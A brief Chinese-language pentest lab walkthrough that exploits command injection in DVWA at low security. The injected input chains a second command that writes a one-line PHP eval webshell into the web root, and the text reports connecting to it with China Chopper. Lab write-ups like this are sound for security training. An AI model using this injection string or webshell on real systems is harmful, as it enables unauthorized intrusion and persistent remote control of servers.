滲透測試 命令注入(代碼注入)Dvwa-low

在輸入框輸入:8.8.8.8 && echo 「<?php @eval($_REQUEST[666])?>」>2.php 將一句話木馬寫入到E:\phpstudy\PHPTutorial\WWW\DVWA-master\vulnerabilities\exec下,形成一個2.php文件運行結果在文件中查看2.php 看到寫入成功用中國菜刀連接,添加地址連接成功
相關文章
相關標籤/搜索